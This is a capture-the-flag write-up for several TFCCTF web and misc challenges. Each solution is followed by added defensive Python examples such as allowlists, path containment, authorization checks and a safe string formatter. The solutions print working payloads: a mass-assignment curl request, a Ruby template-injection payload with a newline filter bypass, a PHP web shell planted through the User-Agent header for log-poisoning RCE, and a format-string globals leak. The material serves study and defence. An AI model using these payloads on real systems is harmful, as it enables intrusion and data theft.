I skipped writing up the super easy problems.
WEB
[ Are you Admin? ]
I couldn't modify the "isAdmin" field with Fiddler, so I decided to use a curl command to set isAdmin = true.
curl -i -H 'Content-Type: application/json' -d '{"username":"derp","isAdmin":true}' 'http://01.linux.challenges.ctf.thefewchosen.com:49395/api/auth'
Flag : TFCCTF{S4n1t1z3_Y0ur_1nput5!}
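The bug behind this challenge is mass assignment: the server copies whatever keys the JSON body contains into the account, so a client-supplied "isAdmin" is simply believed. The following is an added example of my own (not the challenge's server code) showing the vulnerable pattern next to a hardened handler that reads only an allowlist of client fields and leaves the privilege flag at its server-side default. The field names and the User dataclass are assumptions; the request body is the one from the curl command above.

```python
import json
from dataclasses import dataclass

# Assumed allowlist: the only JSON keys the server accepts from a client.
CLIENT_FIELDS = {"username", "password"}


@dataclass
class User:
    username: str
    password: str
    is_admin: bool = False   # decided server-side, never taken from the request body


def create_user_unsafe(body: str) -> User:
    """Mass assignment: every key in the JSON body lands in the account,
    so {"isAdmin": true} is honoured as sent."""
    data = json.loads(body)
    return User(
        username=data["username"],
        password=data.get("password", ""),
        is_admin=bool(data.get("isAdmin", False)),
    )


def create_user_safe(body: str, *, strict: bool = True) -> User:
    """Hardened: only allowlisted keys are read. Unknown keys are rejected
    (strict=True) or silently dropped (strict=False); is_admin keeps its default."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("JSON object expected")
    extra = set(data) - CLIENT_FIELDS
    if extra and strict:
        raise ValueError(f"unexpected fields: {sorted(extra)}")
    username = data.get("username")
    if not isinstance(username, str) or not username:
        raise ValueError("username required")
    password = data.get("password", "")
    if not isinstance(password, str):
        raise ValueError("password must be a string")
    return User(username=username, password=password)


# The request body used in the write-up.
CHALLENGE_BODY = '{"username":"derp","isAdmin":true}'

if __name__ == "__main__":
    print(create_user_unsafe(CHALLENGE_BODY))            # is_admin=True
    print(create_user_safe(CHALLENGE_BODY, strict=False))  # is_admin=False
```

Rejecting unknown keys (strict mode) is the better default for an authentication endpoint: a request that carries fields the schema does not know is either a client bug or an attempt like this one, and either way it is worth logging rather than quietly accepting.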
[ DeepLinks ]
The description says "Find out hidden page". I thought it was impossible to list every candidate page by hand, so I used the tool "dirsearch".
I finally found the "/.well-known/apple-app-site-association" page. Visiting it, I could download a file.
Opening it with Notepad, the contents look like this.
{
    "applinks": {
        "apps": [],
        "details": [
            {
                "appID": "ABCDEFGHIJ.com.example.example",
                "paths": ["TFCCTF{4ppl3_4pp_51t3_4550c14t10n}"]
            }
        ]
    }
}
Flag : TFCCTF{4ppl3_4pp_51t3_4550c14t10n}
[ Diamonds ]
I got a hint from the title of the web page, "Ruby".
After searching "Ruby vulnerability" on Google, I got the hint that it is a Ruby SSTI vulnerability. Ruby's template syntax looks like "<% ~~ %>". But because of filtering, I couldn't use "<", ">", or "%". So I used the URL-encoded newline "%0a" to bypass the filter.
Payload : TEST%0a<%25=+File.open('flag.txt').read+%25>
Flag : TFCCTF{02718f35dddc266e0ac40c0c0dcc98c34edd545678dc752ba9831b6d73bc706f}
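The challenge's filter source is not shown, so why a newline defeats it is an assumption on my part; the usual cause is anchor semantics. In Ruby, `^` and `$` always match at line boundaries, so a check like `/^[^<>%]*$/` passes as soon as one line of the value is clean (the Rails security guide recommends `\A` and `\z` for exactly this reason). The example below is added code of my own, not the challenge's, written in Python with `re.MULTILINE` to reproduce the line-anchored behaviour beside a whole-string check. It also decodes the parameter before validating, since a `%` sent as `%25` is invisible to a check that runs on the raw query string.

```python
import re
from urllib.parse import unquote

# The characters the write-up says the challenge blocks.
CLEAN_LINE = re.compile(r"^[^<>%]*$", re.MULTILINE)   # per-line anchors, as Ruby's ^ and $ behave
CLEAN_STRING = re.compile(r"[^<>%]*")                  # used with fullmatch: the entire value


def passes_line_anchored_filter(value: str) -> bool:
    """Weak check: one clean line anywhere in the value is enough to pass."""
    return CLEAN_LINE.search(value) is not None


def passes_whole_string_filter(value: str) -> bool:
    """Hardened check: every character of the decoded value must be allowed."""
    return CLEAN_STRING.fullmatch(value) is not None


def validate_query_param(raw: str, strict: bool = True) -> bool:
    """Decode first, then validate. Validating the still-encoded string would
    let '%25' (an encoded '%') through untouched."""
    value = unquote(raw)
    check = passes_whole_string_filter if strict else passes_line_anchored_filter
    return check(value)


# The payload shape from the write-up, as it arrives in the query string.
PAYLOAD = "TEST%0a<%25=+File.open('flag.txt').read+%25>"

if __name__ == "__main__":
    print(validate_query_param(PAYLOAD, strict=False))   # True: first line "TEST" is clean
    print(validate_query_param(PAYLOAD, strict=True))    # False: '<' and '%' are present
```

Python without `re.MULTILINE` has a smaller version of the same pitfall (`$` also matches before a single trailing newline); `fullmatch` avoids both. The stronger fix is to never splice user input into template source at all and pass it to the template as a value.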
[ Includes What Matters ]
The main page is this.
Then I entered the hyperlink.
I can see a file parameter with test.txt and an "include_path". It seems that this service uses Apache and PHP. I tried to exploit it using the file parameter.
I entered the "/etc/passwd" file, but there was no flag in it. So I used the "User-agent" header to trigger RCE.
User-agent: <?php system($_GET['shell'])?>
Now I can use two parameters, file and shell. Check this out: I sent "?file=/var/log/apache2/access.log&shell=ls".
I can see "index.php static" on the last line. The RCE trigger succeeded. After searching for where the flag is and checking it, I got the flag.
The flag's path is "/hidden_fl4g.txt".
Flag : TFCCTF{LF1_1S_D4NG3R0US_4ND_L34DS_T0_RC3}
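The chain above needs two things from the server: a file parameter that can reach any path, and an include that executes whatever the file contains (which is why a PHP tag placed in the access log via User-Agent runs). The added example below, my own code rather than the challenge's PHP, shows the containment check a page-include should perform: the requested name is resolved against a fixed root, anything that escapes the root or is not a page file is refused, and so neither "/etc/passwd" nor the Apache log is ever reachable. The root directory and the allowed suffixes are assumptions.

```python
import posixpath
from typing import Optional

# Assumed document root for includable pages and the file types allowed there.
PAGES_ROOT = "/var/www/pages"
ALLOWED_SUFFIXES = (".txt", ".html")


def resolve_include(requested: str, root: str = PAGES_ROOT) -> Optional[str]:
    """Map a user-supplied 'file' parameter onto a path that must stay under root.
    Returns the normalized path, or None when the request has to be refused."""
    if not requested or "\x00" in requested:
        return None                       # empty or NUL-truncated names are never valid
    if posixpath.isabs(requested):
        return None                       # "/etc/passwd": absolute paths are never served
    candidate = posixpath.normpath(posixpath.join(root, requested))
    # normpath has collapsed any "../" segments; refuse anything that left the root
    if posixpath.commonpath([root, candidate]) != root:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None                       # logs and source files are not pages
    return candidate


if __name__ == "__main__":
    for name in ("test.txt", "/etc/passwd", "../../../var/log/apache2/access.log"):
        print(f"{name!r:45} -> {resolve_include(name)}")
```

On a real server the candidate should additionally be passed through `os.path.realpath` before the containment check, so that a symlink inside the root cannot point outside it. The second half of the fix is independent of paths: content that attackers can write to (logs, uploads, session files) must only ever be read as data, never handed to an interpreter.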
[ Calendar ]
I have to find the password. The password is the flag.
This is the main page.
Nothing seems suspicious, so I entered the sample page.
I can see the parameter "page_id=2", so I tested this parameter. I tried "page_id=3" and "page_id=4".
But when I changed the parameter to "page_id=5", things changed.
I can see the password.
Flag : TFCCTF{WPNe3MgF$sNj8E8F6d}
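page_id is a sequential identifier that selects a record with no check on who is asking, the classic insecure direct object reference. The added example below is my own code, not the challenge's: a small page store (constructed data, including an unpublished page 5 holding a placeholder secret) with the lookup as the challenge behaves, the same lookup with a per-object authorization check, and a second layer that exposes random tokens instead of sequential numbers so neighbouring records cannot be reached by counting.

```python
import secrets
from typing import Dict, Optional

# Constructed store with sequential internal ids, as the challenge's page_id behaves.
PAGES = {
    1: {"owner": "alice", "published": True,  "body": "Team calendar, January"},
    2: {"owner": "alice", "published": True,  "body": "Sample page"},
    3: {"owner": "bob",   "published": True,  "body": "Sample page 3"},
    4: {"owner": "bob",   "published": True,  "body": "Sample page 4"},
    5: {"owner": "admin", "published": False, "body": "password: <constructed placeholder>"},
}


def get_page_unsafe(page_id: int) -> Optional[str]:
    """IDOR: the id alone selects the record, so any visitor can walk 1, 2, 3, ..."""
    page = PAGES.get(page_id)
    return page["body"] if page else None


def get_page(page_id: int, requester: Optional[str]) -> Optional[str]:
    """Per-object authorization: readable if published, or if the requester owns it.
    Missing and forbidden look identical, so the endpoint is not an existence oracle."""
    page = PAGES.get(page_id)
    if page is None:
        return None
    if page["published"] or (requester is not None and page["owner"] == requester):
        return page["body"]
    return None


class PublicIds:
    """Second layer: hand out random tokens instead of internal sequential ids."""

    def __init__(self) -> None:
        self._to_internal: Dict[str, int] = {}
        self._to_public: Dict[int, str] = {}

    def public_id(self, internal_id: int) -> str:
        if internal_id not in self._to_public:
            token = secrets.token_urlsafe(12)      # 96 bits: not guessable by enumeration
            self._to_public[internal_id] = token
            self._to_internal[token] = internal_id
        return self._to_public[internal_id]

    def internal_id(self, token: str) -> Optional[int]:
        return self._to_internal.get(token)


if __name__ == "__main__":
    print(get_page_unsafe(5))        # the secret, for anyone
    print(get_page(5, None))         # None for an anonymous visitor
    print(get_page(5, "admin"))      # the secret, for its owner
```

Random tokens are a complement, not a substitute: the authorization check is what actually protects page 5, the token only removes the cheap enumeration path.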
MISC
[ Discord SHENANIGANS V2 ]
I think I have to send some secret command to the Discord bot to get the flag. First, I sent "/flag" to the bot.
Not this command. I asked nicely: "/flag please".
I got the hint "exfilterate the flag". I searched the other sections in Discord and found that the flag is in #announcement.
I found two images. I picked the second one, downloaded it, and uploaded it to an online EXIF tool (I used https://jimpl.com/).
Flag : TFCCTF{h1dd3n_1n_pl4in_br3ad!...1_m3an_s1gh7}
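The flag lived in the image's metadata, which is exactly what an EXIF viewer reads and what a publishing pipeline should strip. As an added example of my own (not the challenge's code and not what jimpl.com runs), here is a minimal parser for the ASCII tags of a JPEG's EXIF IFD0, a matching stripper, and a builder for a constructed JPEG skeleton (marker segments only, no pixel data) that carries a sample ImageDescription. The tag table holds a few standard TIFF tag numbers; the sample text is constructed.

```python
import struct
from typing import Dict

# A few standard TIFF/EXIF ASCII tags that commonly carry free text.
TAG_NAMES = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
             0x0131: "Software", 0x013B: "Artist", 0x8298: "Copyright"}


def build_sample_jpeg(description: str) -> bytes:
    """Constructed test image: SOI, one APP1/Exif segment, EOI. No pixel data."""
    desc = description.encode("ascii") + b"\x00"
    entries = 2
    ifd_len = 2 + 12 * entries + 4
    desc_offset = 8 + ifd_len                                   # text sits right after IFD0
    ifd = struct.pack("<H", entries)
    ifd += struct.pack("<HHII", 0x010E, 2, len(desc), desc_offset)   # ImageDescription, by offset
    ifd += struct.pack("<HHI4s", 0x010F, 2, 4, b"ACM\x00")            # Make, short enough to be inline
    ifd += struct.pack("<I", 0)                                        # no IFD1
    tiff = b"II" + struct.pack("<HI", 42, 8) + ifd + desc              # little-endian TIFF header
    payload = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload + b"\xff\xd9"


def _ifd0_ascii_tags(tiff: bytes) -> Dict[str, str]:
    """Decode the ASCII entries of the first IFD of a TIFF block."""
    if len(tiff) < 8:
        raise ValueError("TIFF header truncated")
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd_offset = struct.unpack(order + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(order + "H", tiff[ifd_offset:ifd_offset + 2])
    tags: Dict[str, str] = {}
    for i in range(count):
        start = ifd_offset + 2 + 12 * i
        tag, typ, n, raw = struct.unpack(order + "HHI4s", tiff[start:start + 12])
        if typ != 2:                    # 2 = ASCII; other value types are skipped here
            continue
        if n <= 4:                      # values of up to 4 bytes are stored inside the entry
            data = raw[:n]
        else:                           # longer values are stored at an offset from the TIFF start
            (off,) = struct.unpack(order + "I", raw)
            if off + n > len(tiff):
                raise ValueError("ASCII value points outside the TIFF block")
            data = tiff[off:off + n]
        tags[TAG_NAMES.get(tag, f"0x{tag:04X}")] = data.rstrip(b"\x00").decode("ascii", "replace")
    return tags


def exif_ascii_tags(jpeg: bytes) -> Dict[str, str]:
    """Walk the JPEG marker segments up to the scan data and decode IFD0 ASCII
    tags from the first APP1/Exif segment found; {} if there is none."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg):
        prefix, marker, seg_len = struct.unpack(">BBH", jpeg[pos:pos + 4])
        if prefix != 0xFF:
            raise ValueError(f"corrupt marker at offset {pos}")
        if marker in (0xD9, 0xDA):      # EOI or SOS: metadata segments are over
            break
        segment = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and segment.startswith(b"Exif\x00\x00"):
            return _ifd0_ascii_tags(segment[6:])
        pos += 2 + seg_len
    return {}


def strip_exif(jpeg: bytes) -> bytes:
    """Mitigation for publishing: drop every APP1/Exif segment before sharing an image."""
    out = bytearray(jpeg[:2])
    pos = 2
    while pos + 4 <= len(jpeg):
        prefix, marker, seg_len = struct.unpack(">BBH", jpeg[pos:pos + 4])
        if prefix != 0xFF:
            raise ValueError(f"corrupt marker at offset {pos}")
        if marker in (0xD9, 0xDA):
            break
        end = pos + 2 + seg_len
        if not (marker == 0xE1 and jpeg[pos + 4:pos + 10] == b"Exif\x00\x00"):
            out += jpeg[pos:end]        # keep every segment except Exif
        pos = end
    out += jpeg[pos:]                   # scan data and EOI pass through unchanged
    return bytes(out)


if __name__ == "__main__":
    img = build_sample_jpeg("constructed sample text")
    print(exif_ascii_tags(img))              # {'ImageDescription': 'constructed sample text', 'Make': 'ACM'}
    print(exif_ascii_tags(strip_exif(img)))  # {}
```

Only IFD0 ASCII tags are decoded here; a full tool also follows the ExifIFD pointer (UserComment lives there), IFD1 thumbnails, XMP in other APP1 segments and IPTC in APP13, all of which are further places where text can ride along with a published image.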
[ Pattern ]
There's only one file, main.py.
# main.py
import dataclasses
import errno
import os
import random

FLAG = os.environ.get("FLAG")
if not FLAG:
    print("If you're running this locally, please create a fake flag env variable.")
    print("If you're seeing this on the remote server, please contact the admins.")
    exit(errno.ENOENT)


@dataclasses.dataclass
class Message:
    message: str

    def __str__(self):
        return self.message

    __repr__ = __str__


MESSAGES = [
    Message("Thank you for using our service."),
    Message("Here is your pattern:"),
    Message("Until next time!")
]

pattern = input("pattern> ")
count = int(input("count> "))
final_pattern = pattern * count
# The user-supplied pattern becomes part of the format string, so any "{...}" field in it is evaluated by .format()
print(f"{{message}} {final_pattern}".format(message=random.choice(MESSAGES)))
It's a basic program, and runs like this.
The important code here is the format string. By manipulating the message class, I can get the flag.
Reference : https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/
Payload : {message.__str__.__globals__[FLAG]}
Flag : TFCCTF{Th15_G1vEs_pr1ntf_v1b35}
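The leak works because the f-string builds a format string that still contains the user's braces, and `str.format` then resolves attribute and index access inside a field: `message.__str__` is a bound method, its `__globals__` is the module dictionary, and `[FLAG]` reads the key. The added example below is my own code, not the challenge's: the vulnerable rendering, the one-line fix (interpolate user text as a value, never parse it as a template), and, for the case where user-supplied templates are a genuine requirement, a `string.Formatter` subclass that refuses field traversal. The FLAG value here is a constructed stand-in for the environment variable.

```python
import string
from dataclasses import dataclass

# Constructed stand-in for the challenge's FLAG environment variable.
FLAG = "TFCCTF{constructed_fake_flag}"


@dataclass
class Message:
    message: str

    def __str__(self):
        return self.message


def render_unsafe(message: Message, pattern: str, count: int) -> str:
    """The challenge's construction: the user pattern is spliced into the format
    string, so a field like {message.__str__.__globals__[FLAG]} is resolved."""
    final_pattern = pattern * count
    return f"{{message}} {final_pattern}".format(message=message)


def render_safe(message: Message, pattern: str, count: int) -> str:
    """Fix: the user text is interpolated as a value; braces in it stay literal."""
    final_pattern = pattern * count
    return f"{message} {final_pattern}"


class SafeFormatter(string.Formatter):
    """For user-supplied templates: only bare {name} fields are allowed.
    Attribute (.) and index ([) traversal are refused before any lookup happens."""

    def get_field(self, field_name, args, kwargs):
        if "." in field_name or "[" in field_name:
            raise ValueError(f"traversal not allowed in field {field_name!r}")
        return super().get_field(field_name, args, kwargs)


def render_user_template(template: str, message: Message) -> str:
    """Render a template chosen by the user with the restricted formatter."""
    return SafeFormatter().format(template, message=message)


if __name__ == "__main__":
    m = Message("Here is your pattern:")
    payload = "{message.__str__.__globals__[FLAG]}"
    print(render_unsafe(m, payload, 1))   # leaks FLAG
    print(render_safe(m, payload, 1))     # prints the braces literally
    print(render_user_template("{message} ok", m))
```

The restricted formatter still lets a user pick a format spec (`{message:>40}`), which is harmless; what it removes is the ability to walk from a passed-in object to anything else in the process, which is the whole substance of this class of bug.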
Comment :
There were many problems where I could roughly guess how the flag would come out. However, because I didn't know how to use the hacking tools, even the easy problems ate up quite a lot of my time. Besides that, I had forgotten many basic command usages, so a lot of time went into googling. I think I need to study again from the basics.